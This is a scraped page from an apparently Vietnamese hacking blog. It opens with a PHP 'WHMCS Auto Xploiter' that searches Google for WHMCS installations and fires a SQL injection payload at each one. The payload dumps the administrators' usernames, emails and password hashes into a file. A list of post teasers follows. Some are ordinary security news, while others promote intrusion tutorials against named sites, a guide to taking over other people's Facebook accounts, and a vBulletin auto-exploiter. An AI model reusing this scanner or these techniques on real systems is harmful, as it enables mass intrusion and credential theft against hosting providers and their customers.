http://i.imgur.com/oNpZAf6.png
http://i.imgur.com/gFlBjtD.png
*****************************************************
*/

set_time_limit(0);
ini_set('memory_limit', '64M');
header('Content-Type: text/html; charset=UTF-8');
function letItBy(){ ob_flush(); flush(); }
function getAlexa($url)
{
 $xml = simplexml_load_file('http://data.alexa.com/data?cli=10&dat=snbamz&url='.$url);
 $rank1 = $xml->SD[1];
 if($rank1)
  $rank = $rank1->POPULARITY->attributes()->TEXT;
 else
  $rank = 0;
 return $rank;
}
 
function google_that($query, $page=1)
{
 $resultPerPage=8;
 $start = $page*$resultPerPage;
 $url = "http://ajax.googleapis.com/ajax/services/search/web?v=1.0&hl=iw&rsz={$resultPerPage}&start={$start}&q=" . urlencode($query);
 $resultFromGoogle = json_decode( http_get($url, true) ,true);
 if(isset($resultFromGoogle['responseStatus'])) {
  if($resultFromGoogle['responseStatus'] != '200') return false;
  if(sizeof($resultFromGoogle['responseData']['results']) == 0) return false;
  else return $resultFromGoogle['responseData']['results'];
 }
 else
  die('The function <b>' . __FUNCTION__ . '</b> Kill me :( <br>' . $url );
}
 
function http_get($url, $safemode = false){
 if($safemode === true) sleep(1);
 $im = curl_init($url);
 curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
 curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
 curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
 curl_setopt($im, CURLOPT_HEADER, 0);
 return curl_exec($im);
 curl_close();
}

function check_vuln($url) {
$url = dirname($url) . '/viewticket.php';
$url = str_replace("/admin","",$url);

$post = "tid[sqltype]=TABLEJOIN&tid[value]=-1 union select 1,0,0,0,0,0,0,0,0,0,0,(SELECT GROUP_CONCAT(0x3a3a3a3a3a,id,0x3a,username,0x3a,email,0x3a,password,0x3a3a3a3a3a) FROM tbladmins),0,0,0,0,0,0,0,0,0,0,0#";
$curl_connection = curl_init($url);
if($curl_connection != false) {
 curl_setopt($curl_connection, CURLOPT_CONNECTTIMEOUT, 30);
 curl_setopt($curl_connection, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)");
 curl_setopt($curl_connection, CURLOPT_RETURNTRANSFER, true);
 curl_setopt($curl_connection, CURLOPT_SSL_VERIFYPEER, false);
 curl_setopt($curl_connection, CURLOPT_FOLLOWLOCATION, 1);
 curl_setopt($curl_connection, CURLOPT_POSTFIELDS, $post);
 $source = curl_exec($curl_connection);
 preg_match_all('/:::::(.*?):::::/s',$source,$infoz);
 if($infoz[0]) {
  return $infoz[0];
 }
 else
  return "Fail!";
}
else
 return "Fail!";
}
?>
<html>
<head>
<title>WHMCS Auto Xploiter - by g00n</title>
</head>
<body style="background-image: url('http://i.imgur.com/zHNCk2e.gif'); background-repeat: repeat; background-position: center; background-attachment: fixed;">

<STYLE>
textarea{background-color:#105700;color:lime;font-weight:bold;font-size: 20px;font-family: Tahoma; border: 1px solid #000000;}
input{FONT-WEIGHT:normal;background-color: #105700;font-size: 15px;font-weight:bold;color: lime; font-family: Tahoma; border: 1px solid #666666;height:20}
body {
font-family: Tahoma
}
tr {
BORDER: dashed 1px #333;
color: #FFF;
}
td {
BORDER: dashed 1px #333;
color: #FFF;
}
.table1 {
BORDER: 0px Black;
BACKGROUND-COLOR: Black;
color: #FFF;
}
.td1 {
BORDER: 0px;
BORDER-COLOR: #333333;
font: 7pt Verdana;
color: Green;
}
.tr1 {
BORDER: 0px;
BORDER-COLOR: #333333;
color: #FFF;
}
table {
BORDER: dashed 1px #333;
BORDER-COLOR: #333333;
BACKGROUND-COLOR: Black;
color: #FFF;
}
input {
border   : dashed 1px;
border-color  : #333;
BACKGROUND-COLOR: Black;
font: 8pt Verdana;
color: Red;
}
select {
BORDER-RIGHT:  Black 1px solid;
BORDER-TOP:    #DF0000 1px solid;
BORDER-LEFT:   #DF0000 1px solid;
BORDER-BOTTOM: Black 1px solid;
BORDER-color: #FFF;
BACKGROUND-COLOR: Black;
font: 8pt Verdana;
color: Red;
}
submit {
BORDER:  buttonhighlight 2px outset;
BACKGROUND-COLOR: Black;
width: 30%;
color: #FFF;
}
textarea {
border   : dashed 1px #333;
BACKGROUND-COLOR: Black;
font: Fixedsys bold;
color: #999;
}
BODY {
 SCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-color: #FFF; SCROLLBAR-SHADOW-color: #FFF; SCROLLBAR-3DLIGHT-color: #FFF; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-color: #FFF; SCROLLBAR-DARKSHADOW-color: #FFF
margin: 1px;
color: Red;
background-color: Black;
}
.main {
margin   : -287px 0px 0px -490px;
BORDER: dashed 1px #333;
BORDER-COLOR: #333333;
}
.tt {
background-color: Black;
}

A:link {
 COLOR: White; TEXT-DECORATION: none
}
A:visited {
 COLOR: White; TEXT-DECORATION: none
}
A:hover {
 color: Red; TEXT-DECORATION: none
}
A:active {
 color: Red; TEXT-DECORATION: none
}

#result{margin:10px;}
#result span{display:block;}
#result .Y{background-color:green;}
#result .X{background-color:red;}
</STYLE>
<script language=\'javascript\'>
function hide_div(id)
{
  document.getElementById(id).style.display = \'none\';
  document.cookie=id+\'=0;\';
}
function show_div(id)
{
  document.getElementById(id).style.display = \'block\';
  document.cookie=id+\'=1;\';
}
function change_divst(id)
{
  if (document.getElementById(id).style.display == \'none\')
    show_div(id);
  else
    hide_div(id);
}
</script>
</td></table></tr>
<br>
<br>
<link rel="stylesheet" type="text/css" href="http://fonts.googleapis.com/css?family=Audiowide">
    <style>
      body {
        font-family: 'Audiowide', serif;
        font-size: 30px;
  
      }
    </style>
  </head>

  <body onLoad="type_text()" ; bgColor=#000000 text=#00FFFF background="Fashion fuchsia">
    <center>
<font face="Audiowide" color="red">WHMCS Auto Xploiter <font color="green">(0day)</font>
<br>
<font color="white" size="4">[For WHMCS ver. <= </font><font color="green" size="4">5.2.8</font><font color="white" size="4">]</font>
</font>
<br><br>

<table border=1 bordercolor=red>
<tr>
<td width="700">
<br />
<center>
 <form method="post">
  Google Dork:   
  <input type="text" id="dork" size="30" name="dork" value="<?php echo (isset($_POST['dork']{0})) ? htmlentities($_POST['dork']) : 'inurl:submitticket.php'; ?>" />
    <input type="submit" value="Xploit!" id="button"/>
 </form>
<?php
 if(isset($_POST['dork']{0})) {
  $file = fopen("WMCS-Hashes.txt","a");
  echo '<br /><div id="result"><b>Scanning has been started... Good luck! ;)</b><br><br>';   
  letItBy();   
  for($googlePage = 1; $googlePage <= 50; $googlePage++) {
   $googleResult = google_that($_POST['dork'], $googlePage);
   if(!$googleResult) {
    echo 'Finished scanning.';
    fclose($file);
    break;
   }
   
   for($victim = 0; $victim < sizeof($googleResult); $victim++){
    $result = check_vuln($googleResult[$victim]['unescapedUrl']);
    $alexa = getAlexa($googleResult[$victim]['unescapedUrl']);
    if($result != "Fail!") {
     $hashes = "";
     foreach ($result as $record) {
      $hashes = $hashes . str_replace(':::::','',$record) . "\n";
     }
     $sep = "========================================================\n";
     $data = $sep . $googleResult[$victim]['unescapedUrl'] . " - Alexa: " .$alexa. "\n" . $sep . $hashes . "\n";
     fwrite($file,$data);
     echo "<br /><font color=\"green\">Successfully Xploited...</font>";
     echo '<span class="Y">';
     echo "<pre>" . $data . "</pre></span><br />";
     
    }
    else {
    echo '<span class="X">';
    echo "<a href=\"{$googleResult[$victim]['unescapedUrl']}\" target='_blank'>{$googleResult[$victim]['titleNoFormatting']}</a> - <font color=\"black\">Failed!</font>";
    echo "</span>\n<br />";
    }
    letItBy();
   }
  }
  echo '</div>';
 }
?>
</center>
</td>
</table>
<br /><br />
<font face="Audiowide" color="red" size="2">
Coded by: <font color="white">g00n</font> <font color="white">|</font> Skype: <font color="white"><a href="Skype:t3hg00n">t3hg00n</a></font><br /><br />
<br > <font color="green">For more tools/scripts/exploits/etc.</font>
<br />visit <a href="http://xploiter.net" target="_blank" style="text-decoration: none;">www.Xploiter.net</a>
</font>

</center>
</body>
</html>

Source: http://pastebin.com/cuikqkhA

[Mr.P1n3] How I checked bknic.hut.edu.vn?

Victim:

Bknic.hut.edu.vn

Download Tutorial:

http://www.mediafire.com/download/a980t2g18ri3cov/bachkhoa.rar

Tutorial by Mr.P1n3.

Hội thảo Tetcon 2013 Video Clip

Ngày 15/01/2013 vừa qua HVA đã tổ chức thành công chương trình hội thảo An toàn thông tin thường niên Tetcon 2013.

Hội thảo Tetcon năm nay thành công rực rỡ là vì có sự đóng góp rất lớn từ những bài tham luận vô cùng tuyệt vời của các diễn giả có nhiều năm kinh nghiệm trong ngành An toàn thông tin.

Nhằm giúp các thành viên HVA yêu thích An toàn thông tin nhưng không có cơ hội tham gia coi trực tiếp và trao đổi trực tiếp với các diễn giả tuyệt vời của Tetcon 2013 có thể tham khảo một phần của các bài tham luận này. HVA News trân trọng cung cấp video clip quay lại các bài tham luận của Tetcon 2013.

READ MORE »

Hướng dẫn đăng status có reply (trả lời theo từng bình luận) trên Facebook

Trong mấy ngày gần đây đang có trao phong trào đăng status với nút Reply, tính năng trả lời theo từng bình luận này tất nhiên không còn xa lạ gì với những bạn nào làm admin tại các Fan Page, nhưng đối với một tài khoản Facebook cá nhân thì sẽ gây sự chú ý đúng không nào!

READ MORE »

Những "căn bệnh" con người có thể mắc phải từ công nghệ

Những triệu chứng chỉ xuất hiện trong kỷ nguyên công nghệ là mặt trái của sự hiện đại và Internet đối với đời sống của con người.
Công nghệ hiện đại thực sự đã thay đổi cuộc sống của chúng ta bằng cách mang lại những trải nghiệm mới mẻ, tiện ích và nhanh hơn. Thế nhưng, không có điều gì là hoàn hảo, mặc dù lợi ích đã lấn át đi một số điểm trừ mang lại, công nghệ cũng đã khai sinh ra không ít những “căn bệnh” mà con người có thể đang mắc phải mà không hề hay biết.

READ MORE »

Những “con chuột” trên Facebook

Khi sáng lập mạng xã hội Facebook, Mark Zuckerberg đã rất thành công khi đưa vào nút like để thăm dò thái độ tiếp cận của dân cư mạng. Tuy nhiên, hành xử như thế nào để được “like”.

Nếu như sự vĩ đại của Bill Gates ở chỗ ông dự đoán được tương lai tất cả mọi người đều có máy tính, Steve Jobs thành danh với thương hiệu Apple, thì hiệu quả của Mark Zuckerberg đơn giản hơn rất nhiều: chỉ là một nút like!

READ MORE »

Finally! Yahoo Mail to turn on SSL by default in 2014

Yahoo is planning to finally join the 21st century and turn on SSL encryption for its webmail users in January 2014.

According to the Washington Post, the internet company will enable encryption for all its webmail users, and help protect their privacy, from January 8th.

Without SSL/HTTPS, everything your browser sends and receive from Yahoo Mail is sent as unencrypted text – and could be grabbed in transit (known as “sniffing”) by malicious hackers and snoopers when you check your webmail via WiFi in the coffee shop.

READ MORE »

Facebook's "Who can look up your timeline by name" privacy tool bites the dust

In December 2012, Facebook announced a slew of privacy changes, one of which - the axing of the "Who can look up my timeline by name" feature - annoyed privacy aficionados.

The feature controlled whether someone could be found by typing their name into the Facebook search bar.
The setting was limited in scope and didn't keep people from being found in other ways across the site, Facebook said at the time.

Facebook yanked the setting last year for people who weren't using it.
For the minority of users still using the setting, the plug is now being pulled.

READ MORE »

Hướng dẫn tạo file cài đặt đơn giản với WinRAR

Chào các bạn!

Trong bài viết này mình sẽ hướng dẫn các bạn tạo một file cài đặt đơn giản sử dụng chức năng tạo file nén tự bung của WinRAR. Qua bài viết này, các bạn có thể tự tạo một file cài đặt đối với những chương trình nhỏ hoặc đóng gói một phần mềm Portable chẳng hạn ^^

READ MORE »

Microsoft finally fixes critical Internet Explorer vulnerability

Microsoft’s risk and impact graph showing an aggregate view of October’s Severity and Exploitability Index.

(Credit: Microsoft) 
 

In its security update for this month, Microsoft has patched a critical Internet Explorer vulnerability that possibly exposed users to malware and hacks for the last three months.

READ MORE »

Có phải chúng ta đang sống như một đứa trẻ trên Facebook?

Bạn có bao giờ tự nhìn lại mình rằng bạn đang dùng Facebook như thể một đứa trẻ hét lên "Có ai quan tâm tới tôi không?"

READ MORE »

Hướng dẫn kiếm thêm dung lượng lưu trữ cho tài khoản MediaFire

MediaFire là một trang web chia sẻ dữ liệu miễn phí và không giới hạn, có trụ sở tại Harris County, Texas, Hoa Kỳ. Tất cả các thành viên đăng ký đều có thể sử dụng đầy đủ chức năng của MediaFire. Khi đăng kí một tài khoản (miễn phí) tại MediaFire, bạn sẽ có 50 GB để lưu trữ.

Trong bài viết này, mình sẽ hướng các bạn cách kiếm thêm dung lượng lưu trữ miễn phí.

READ MORE »

WhatsApp, AVG and Alexa Hacked by Pro-Palestinian Kdms Team Hackers

A group of pro-Palestinian hackers aligned with Anonymous has successfully hacked a range of websites including WhatsApp, AVG and Alexa.

The message appearing on the Avira website having been compromised by the pro-Palestinian Kdms Team of hackers. (Twitter)

 

Over the past 24 hours a group calling themselves Kdms Team has claimed responsibility for hacking six different websites, including the homepages of the hugely popular messaging service WhatsApp and the top free anti-virus provider AVG.

READ MORE »

Web Hosting software WHMCS vulnerable to SQL Injection; emergency security update released

WHMCS, a popular client management, billing and support application for Web hosting providers, released an emergency security update for the 5.2 and 5.1 minor releases, to patch a critical vulnerability that was publicly disclosed.

READ MORE »

[eBook] HTML and PHP Tutorials

HTML Web Programming and Designing

HTML (Hyper Text Markup Language) is the web Programming language the most most most useful and useable Web Programming language, Programmer, hacker, developer everyone need to learn HTML. HTML is the Source and Base of all Web Programming languages, If you don't know HTML then you can't learn any Web Programming lang. 

READ MORE »

Top 10 Unknown Google tricks

Google is the Proclaimed king among all search engines present on the internet. Among all the web based search engines, Google stands out because of its high speed and simplicity.

Everyone is familiar with the web applications provided by Google. Some of these are the Gmail, Google Drive, Google app store and a lot more. But little do people know about some very handy tricks that come along with this impeccable search engine.
READ MORE »

Một số thủ thuật Google Search có thể bạn chưa biết

Thủ thuật cho Google thì rất nhiều nhưng ở đây mình xin chia sẻ một số thủ thuật mình hay áp dụng trong quá trình tìm kiếm content để anh em tham khảo.

1. Loại bỏ một từ

Bạn muốn tìm kiếm một cụm từ A, nhưng bạn không muốn hiển thị các kết quả có từ B hãy sử dụng dấu “-”
VD: marketing online -seo
Trong ví dụ bên trên mình tìm kiếm các bài viết liên quan đến marketing online, nhưng không muốn hiển thị các bài viết về SEO.
READ MORE »

How to Speed Up Internet using Command Prompt

In today world most of people using internet. Some of them having high speed internet connection also some peoples don't have high speed internet connection. Speed internet connections also may go slow sometimes. Its just because that your computer settings may have to be changed for the speed connection. We can able to speed up the internet connection by simply with help of command prompt. 

READ MORE »

Facebook Graph Search becomes more powerful than ever, Review your Privacy Settings again

Facebook Graph Search is more powerful than ever, has been updated to allow people to search in greater depth on Facebook.

Facebook expanded its Graph Search to include posts and status updates, which means everything you’ve been posting is way easier to find than ever before.

READ MORE »

Bypass Facebook Security Jacking Method

Ever since I had been problems constantly having to deal with Facebook leaving me out off people's accounts I began to think that I should write over my experiences to help others.

I will go over specific techniques and ideas to eventually grant you entrance to their accounts without having to deal with that Facebook problem having logging in from different location.

1st. Before you even begin reading this, you must already have their passwords or e-mails. If not, I will tell you a few ideas of how to acquire them.

READ MORE »

List of Free Rootkit Remover software for Windows

A Rootkit virus is a stealth type of malware that is designed to hide the existence of certain processes or programs on your computer from regular detection methods, so as to allow it or another malicious process privileged access to your computer. Sometimes a rootkit may even fool your antivirus software and avoid being detected. It is at such times, that you may need to take help of special Rootkit Remover or Removal Tools.

Rootkit Remover

Here is a list of a few Rootkit Removers, most of which we have already covered on this site.

READ MORE »

Làm sao để xóa tài khoản Facebook vĩnh viễn?

Facebook là mạng xã hội lớn nhất hành tinh với hàng triệu người dùng trên khắp thế giới. Một vài người có nhiều hơn một tài khoản, nếu họ quyết định xóa những tài khoản không sử dụng và họ không biết làm thế nào để xóa tài khoản của họ. Nhưng việc đó là khá dễ dàng, hãy xem bài hướng dẫn sau!

READ MORE »

Hướng dẫn cấm vĩnh viễn tài khoản bất kì trên Fan Page Facebook

 

Trong video Tutorial lần này, mình sẽ hướng dẫn các bạn một mẹo nhỏ giúp cấm một thành viên bất kì trên Fan Page Facebook (Tất nhiên là áp dụng với những thành viên vi phạm nội qui Page, spam, câu like,...).

Cùng theo dõi nhé :)

READ MORE »

Facebook cho phép chỉnh sửa status đã đăng

Mới đây, mạng xã hội được nhiều người sử dụng nhất hành tinh, Facebook đã cập nhật tính năng cho phép người dùng có thể sửa status của chính họ. Để chỉnh sửa status đã đăng tải của mình, người dùng có thể click vào biểu tượng nhỏ ở góc phải, sau đó lựa chọn "Chỉnh Sửa Bài Viết".



READ MORE »

[Tutorial] How I checked server 42.112.19.129?

Lười gõ Notepad nên dùng Sub Title cho nhanh mà đỡ tăng thời gian clip vì type nhiều :D

Tutorial by Juno_okyo - J2TeaM - Juno_okyo's Blog.

Internet đang giết chết sự tiến bộ?

Nhiều người trong số chúng ta vẫn tin rằng, Internet là một công cụ hữu ích có vai trò thiết yếu trong đời sống loài người, từ những ngày đầu phát triển của Mạng toàn cầu (World Wide Web) cho tới nay, chúng ta không thể phủ nhận khả năng tiếp cận tri thức của mạng máy tính mang lại cho loài người.

Tuy nhiên, cũng có nhiều ý kiến cho rằng Internet có những ảnh hưởng tiêu cực đối với người sử dụng khi chúng ta quá phụ thuộc vào nó, giảm khả năng sáng tạo và hạn chế sự phát triển của bản thân.

Vậy Internet khiến chúng ta thay đổi như thế nào, nó có những hệ lụy gì đối với sự tiến bộ của loài người. Chúng ta hãy cùng tìm hiểu trong bài viết của Rob May – CEO và cũng là người đồng sáng lập Backupify, giải pháp lưu trữ và khôi phục dữ liệu trên nền tảng điện toán đám mây.

READ MORE »

[Facebook] Cảnh báo ứng dụng câu Like bằng Hijacking

Bằng cách sử dụng những đoạn script Facebook Like Hijacking, attacker hoàn toàn có thể kiểm soát từng click của bạn. Lợi dụng những script này, việc chèn vào các ứng dụng nhằm câu like có thể khiến số like của page tăng nhanh chóng trong khi người dùng hoàn toàn không hay biết việc họ đã bị "ép like" ra sao.

READ MORE »

[eBook] Bộ sách REA-cRaCkErTeAm Tutorials

Đây có thể nói là một bộ tut khổng lồ của REA dày 517 trang, bao gồm 25 crackme tuts và 113 crack soft tuts. Bộ tut này được xây dựng theo mục lục tiện cho việc tra cứu, tham khảo. Các bài viết rất tỉ mỉ, rõ ràng trong việc xác định điểm cần tìm để tiến hành crack cũng như phân tích các đoạn code Asm để từ đó tiến hành Keygen theo một ngôn ngữ lâp trình nào đó.

READ MORE »

[Tip Facebook] Những thiết lập cần biết trên Facebook

Thiết lập để nhận thông báo khi có thiết bị lạ xâm nhập, kích hoạt tính năng bảo mật hai lớp, chặn tài khoản quảng cáo, spam hay kiểm duyệt đường dẫn nguy hiểm sẽ giúp tài khoản Facebook an toàn hơn.

READ MORE »

Facebook Password Finder tools claim to hack into accounts, but are actually worthless

It seems not a day goes by without someone on the internet asking me how they can “recover” a password for a Facebook account that they can no longer access.

Some of them are more honest, and admit that they want to crack the password for someone else’s Facebook account because of a feud, or to pull a practical joke, or to spy upon a boyfriend or girlfriend that they believe might be cheating on them.

Naturally, in any of these scenarios, I’m not going to help. Breaking into someone else’s Facebook account without their permission is illegal, and if you have *genuinely* lost access to your own Facebook account and cannot recover your password through the usual processes, the best people to turn to are Facebook’s support team.

READ MORE »

[Video] vBulletin Install Auto Exploiter Modified Script

Chào các bạn!

Sau khi đọc thông tin về lỗ hổng bảo mật này tại đây thì mình đã tìm hiểu, đọc mã nguồn vBulletin và viết thử script khai thác. Làm luôn cái video cho các bạn dễ hình dung nhé. Công cụ khai thác sẽ được tích hợp vào Juno_okyo's Blog trong thời gian tới! :)

READ MORE »

Major vBulletin based websites are vulnerable to Hackers

 











vBulletin is a publishing suite that allows users to create and publish a variety of content, including: forums, blogs, and polls. 

If you currently use an older version of  vBulletin  on your website, you might be opening up your site to an attack as some serious security vulnerabilities, which allows hackers to access your hosting admin panel.

Two Indian Hackers, going by virtual name  Ne0-h4ck3r & Google-warri0r has developed an exploit of known  vBulletin  vulnerability, that can be used to add a user remotely to  vBulletin  customer panel with admin privileges. 

READ MORE »

Hướng dẫn đăng nhập Ẩn trên Facebook

 

Chào các bạn!

Mình là Juno_okyo, trong bài viết này mình sẽ hướng dẫn các bạn đăng nhập ẩn (Invisible). Chúng ta sẽ thực hiện thông qua Facebook Chat. Nếu chúng ta muốn biết bạn bè có online hay không thì thường chúng ta sẽ mở Facebook Chat và xem nick nào đang hiện chấm nhỏ màu xanh (biểu tượng online) đúng không ;).

READ MORE »

Hướng dẫn hủy theo dõi khi bị "Theo dõi vô thức" trên Facebook

 

Theo dõi vô thức là gì?

Vô thức là hành động mà không làm chủ bản thân. Bạn có thể hiểu ở đây là Theo dõi một cách bị động.

Khi mà trên Facebook xuất hiện quá nhiều những status dạng "lừa đảo, câu sub" thì nhiều khi bạn thấy trên News Feed của mình xuất hiện những status của những người mà bạn không hề quen biết, không có trong danh sách bạn bè, vào xem trang cá nhân thì thấy "Đang theo dõi" (Following). Nhưng thực sự thì bạn chưa từng quen biết thì chắc chắn bạn không nhấn Theo dõi đúng không?

READ MORE »

9 lý do nên yêu trai CNTT (IT)

Các chàng chuyên viên vi tính (IT) thường rất chung tình. Có bao giờ bạn để ý thấy một anh chàng "ngồi đồng" bên chiếc máy tính cả ngày, hầu như không ra khỏi phòng? Đó đích thị là những "con rệp điện tử", yêu máy tính và điện thoại của mình vô cùng. Trong tư tưởng của một số bạn gái, đây là mẫu người yêu vô cùng lý tưởng.


READ MORE »

Is that YouTube Video Downloader browser plugin safe? Beware!

A lot of people, it seems, are keen to download videos from YouTube so that they can view them without the need to be online.

Of course, YouTube doesn’t give you the option to download the movies it hosts – so it’s not an enormous surprise that all manner of tools and browser plugins have been created over the years to help you do it.

Sadly, online criminals and fraudsters are only too aware of this trend – and have created YouTube video downloading plugins for your browser which can lead to your computer being infected with malware, or help them earn money by messing with your browser’s search results or displaying irritating adverts.
Spider.io has published a detailed report looking at two plugins designed to let you download YouTube videos: Easy YouTube Video Downloader plugin and Best Video Downloader.

READ MORE »

Over 20 security holes found in Windows, IE and other software. Patch now

Microsoft has released its regular “Patch Tuesday” bundle of security patches for Windows and its other software, protecting against a number of critical vulnerabilities.

Some of the security holes are classified as “critical”, meaning that malware or malicious hackers could exploit them to compromise a computer without any interaction by the user.

The most serious fix of the bunch is the MS13-059 cumulative patch for Internet Explorer.

READ MORE »